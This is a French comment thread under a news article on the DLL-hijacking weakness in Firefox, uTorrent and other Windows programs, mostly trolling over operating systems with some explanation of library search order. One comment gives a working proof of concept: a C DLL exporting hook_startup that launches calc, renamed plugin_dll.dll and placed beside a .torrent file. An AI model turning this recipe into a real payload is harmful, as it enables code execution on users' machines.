Firefox, uTorrent et d'autres logiciels affectés par une faiblesse au niveau des DLL (MAJ)

@softangel: apprends à lire, c'est un problème d'application qui charge une dll sans vérifier d'où elle vient, ce n'est pas un problème d'os! ou alors tu est inculte et tu sais pas comment marchent les dll, et dans ce cas tu ramène pas ta science.

@tass_:toi t'es encore plus fort que les autres, tu honnis crosoft mais tu utilise des consoles, sans doute le monde le plus fermé et le plus contrôlé qui existe! tiens, c'est pas sony qui a retiré la possibilité d'installer linux sur ps3? ou tu préfère nintendo et sa chasse aux pirates? du coup tu peux bien raconter ce que tu veux, ça ne veut plus rien dire!

ça m'aurait étonné aussi qu'il n'y ai pas des "linuxiens" (ou plutot des anti-crosoft) qui viennent nous gonfler sur une telle news. manque plus que les pro apple!

allez, au hasard:
http://news.softpedi...es-115673.shtml
http://news.softpedi...10-134162.shtml
http://www.pcworld.f...-a-jour/439701/
http://www.presence-...-clavier-35884/

ah, et puis cerise sur le macdo et pour revenir a cette soi disant faille sur les dll, expliquez moi pourquoi apple a corrigé itunes la semaine dernière si c'est un problème purement windows?

avant que vous posiez la question, j'utilise du linux ET du windows sur mes 11 machines. pas d'apple certes, j'ai pas les moyens....

Bon je fais un gros EDIT, désolé laskov, j'étais complètement à côté de la plaque.

Je pense que l'incompréhension vient de la différence entre un Exploit et un Virus.
L'Exploit c'est un 'outil' qui va justement permettre, grâce a une faille, d'introduire un virus/worm/trojan ou de corrompre un fichier/process.
Mais il n'agit pas tout seul, il faut l'utiliser, s'en servir, pour corrompre.
Forcément qu'un tel outil n'est pas bien vu de l'anti-virus. Il est potentiellement nuisible pour un système.
Il n'y a qu'à lire les commentaires du lien de cet Exploit pour se rendre compte que c'est des gens qui cherchent comment utiliser ou mieux utiliser cet outil à côté bien sûr de ceux qui crient au virus.
C'est un outil aux agissements potentiellement 'malsains' donc tout de suite alerté par votre anti-virus.

J'ai une particuliere affection pour les linuxiens qui se la pètent, et pour "leur" prouver "leur" supériorité je "leur" met un peu de lecture:
Exploiting the Linux linker

Juste pour "leur" rappeler "qu'exploiter" un Os utilisé par une minorité ça fait pas beaucoup avancer....

Si si, elle le sait : http://www.academie-...s.html#au_temps

Une "DLL" c'est un fichier objet chargé dynamiquement, comme un ".so" (shared object).

La machinerie d'une DLL est plus différente celle d'un .so, mais en gros c'est la même chose.

Et en aucun cas les DLL ne sont des "Dynamic Library", ces deux termes étant antinomiques. Ce sont des fichiers objets liés chargeables dynamiquement.

Le problème n'est pas tant que les applications se contentent de fournir les noms de bibliothèques au système d'exploitation au lieu des chemins d'accès absolus, dans la mesure où c'est l'usage de faire ainsi et que les applications ne savent pas toujours où se situent exactement les librairies. Par exemple, elle peut se trouver dans le même dossier que le programme (c'est souvent le cas puisque cela permet d'éviter l'Enfer des DLLs) ou dans le dossier Windows ou encore dans un dossier spécifique à l'utilisateur, etc. Le soucis, c'est plus le fait que Windows aille chercher celles-ci dans des lieux réputés non-sûrs et peu susceptibles de contenir les DLLs recherchés, comme le répertoire de travail courant (CWD). Le refus de corriger de Microsoft ne montre pas que cela ne les concerne pas. Au contraire, ça démontre que ce comportement est attendu par tellement de programmes que MS ne peut pas se permettre de rectifier le tir et de briser la compatibilité avec ceux-ci.

Parce que iTunes fonctionne aussi sous Windows et c'est cette version qui a été corrigé face au refus de Microsoft de corriger la faille de leur côté de la barrière.



Ce que dit cet article, c'est qu'il est possible d'enjoindre au lieur dynamique de Linux de chercher les bibliothèques à de tiers endroits, ce qui comprend le répertoire de travail courant (CWD), via une variable d'environnement. C'est heureux, utile et ça peut avoir des usages tout à fait légitime : Par exemple, cette technique permet, en interceptant les appels relatifs aux sockets, d'utiliser des serveurs mandataires de façon transparente pour l'application et donc d'utiliser des proxys avec des programmes non-conçus pour.

La différence entre ce comportement et la faille, c'est que Windows va chercher par défaut dans des répertoires peu sûrs, dont le CWD. J'insiste sur le "par défaut". Sous Linux, comme sous MacOS d'ailleurs, il faut, a priori, expréssement le requérir auprès du lieur dynamique.

Donc, si je comprend bien.
Charger une dll perso (ne faisant pas partie de l'OS) est dangereux si son chemin d'acces n'est pas spécifié ?

Car si je ne m'abuse, quand un programme fait un LoadLibraryA, il passe le nom de la dll en paramètre. trucmuch.dll par exemple, sans le chemin d'accès.
Sauf que Windows par définition, quand il n'y a pas de chemin d'accs, il scanne d'abord le chemin par défaut de l'application (son dossier d'installation) pour y trouver la dll.
Si elle n'y est pas, il scanne alors le dossier system32 de Windows.

Il serait alors aisé d'effacer trucmuch.dll dans le dossier principal du programme et de placer une copie vérolée dans le dossier system32 de Windows.

C'est ça leur "faille" ??

Sinon il y a aussi les dll renommée en .local. C'est marrant ça aussi
http://msdn.microsof...142(VS.85).aspx

A lire avant de se mettre sur la gueule : le monde du développement, qu'il soit Win ou Nix, n'est juste pas simple, ni parfait, comme toute chose.

http://blogs.msdn.co...ng-attacks.aspx

Evidemment que y a pas ce genre de problèmes sous Linux. Comment avoir des problèmes entre un noyau et ses logiciels quand il n'y a justement pas de logiciel pour ce système ?

@tass_: Sony a échappé d'extrême justesse au plus gros problème informatique de tous les temps. Ils sont encore plus dangereux pour la sécurité des données qu'Apple, Google et Microsoft réunis. 10 millions d'utilisateurs dans le vent en moins de 24 heures. àa a du être la panique chez Al Caida !

@ zorro3364: les sociétés secrètes, style Linux, ont toujours besoin d'un ennemi commun pour avancer, se sentir exister et combler leur soif de reconnaissance

FMeumm! Ok mais... mais...(but but dans le texte)

Un exemple tout con, reprenons le "fameux" DLLHijackAuditKit qui fait frémir les Av et surtout certain posteur et autre incrédule(alors qu'il suffisait de jeter un œil sur le regenerate_payloads.rb contenu dans l'archive pour lever tous doutes de vérolage)
- tu prends la runcalc.dll, tu la renommes en plugin_dll.dll et tu la met dans un même dossier qu'un .torrent ou .btsearch. Le clic sur le .x t'ouvrira la calculatrice en même temps que uTorrent...

Unp'tit édit:

#include
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}

Compiler ---> plugin_dll.dll

Heu... tu bosses pour microchiotte et la pomme croquée, ou tu as oublié de mettre une balise [Troll] en début de message ?
Linux, société secrète ? Les seuls qui font du secret, que ce soit en t'obligeant à souscrire à leur ' CLUF ' avant même que tu ne puisses le refuser, tu vois de qui il s'agit ?
Les même qui t'interdisent, par copyright, de modifier leur systèmes d'exploitations.
Mais le plus drôle, c'est que ça fait maintenant plus de 25 ans qu'ils manipulent tout le monde, et que la manipulation a franchement bien prise sur toi.
Tu dois confondre, ce n'est pas parce que tu ne veux pas faire l'effort d'essayer de comprendre ce qu'est Linux que cela t'autorise à faire l'amalgame pitoyable de la ' société secrète ', ne serait-ce que par respect pour ta propre intelligence.

Toi tu lis encore plus mal que les autres, j'ai dit "pour jouer au pire il y a des consoles", alros petite explication de texte :

- Ca ne veux pas dire que je joue.
- Ca ne veux pas dire que j'ai une console chez moi (d'ailleurs j'en ai pas, je joue de temps en temps chez des potes).
- Ca veut surtout dire que je fais bien la distinction Ordinateur / Console, la console si c'est une boite noire qui permet de jouer, rien à battre, c'est justement son but. Un ordinateur est bien plus que ça et oui ça me dérange qu'il y ai des boites noires à l'intérieur.

Donc avant de dire que ça ne veut rien dire apprend à lire.


Idem que ci dessus, en plus les dernières consoles que j'ai eu étaient loin de pouvoir accéder au Net, on n'y pensais même pas à l'époque, une console peut être fermée, je demande pas à connaître le code de l'IA d'un échiquier électronique par exemple...

entre deux bla bla je dis, tous les windowseux sont concernés par cette vulnérabilité. j'attend avec impatience le correctif de ffox car j'ai pas vu ça dans l'article, c'est qu'il existe pas encore.... Enfin j'imagine... Et au temps / autant, les deux sont bons. J'ai aussi cru à une époque que tout le monde se plantait en collant autant au lieu de au temps mais non...

Ce matin encore une correction µTorrent build 21515. Ben alors si la build 21431 corrigeait déjà, on est paré avec la version 2.0.4

àa me rappelle des mauvais souvenirs, qui me font sourire depuis je suis passé définitivement sur l'OS Ubuntu. Mon seul regret a été de n'avoir pas franchis le pas plus tôt, ça m'aurait évité des années de galère.